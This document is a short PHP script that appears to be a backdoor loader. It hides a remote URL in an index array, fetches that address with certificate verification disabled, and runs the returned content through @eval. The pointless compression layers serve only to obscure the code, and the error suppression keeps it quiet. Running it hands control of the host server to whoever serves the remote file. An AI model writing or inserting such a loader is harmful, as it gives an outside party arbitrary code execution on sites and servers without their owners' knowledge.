<?php

 $characters = array_merge(range('a', 'z'), range('A', 'Z'), range('0', '9'), ['.', ':', '/', '_', '-']);
 $indexArray = [7,19,19,15,18,63,64,64,58,61,7,4,10,19,0,17,62,15,0,6,4,18,62,3,4,21,64,8,12,0,6,4,18,64,18,4,11,62,19,23,19];
 $decodedString = '';
foreach ($indexArray as $index) {
    $decodedString .= $characters[$index];
}
 $url = $decodedString;

function fetchContent($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    $content = curl_exec($ch);
    curl_close($ch);
    return gzdeflate(gzcompress(gzdeflate(gzcompress(gzdeflate(gzcompress(gzdeflate(gzcompress($content))))))));
}

@eval("?>".gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(fetchContent($url)))))))));

?>
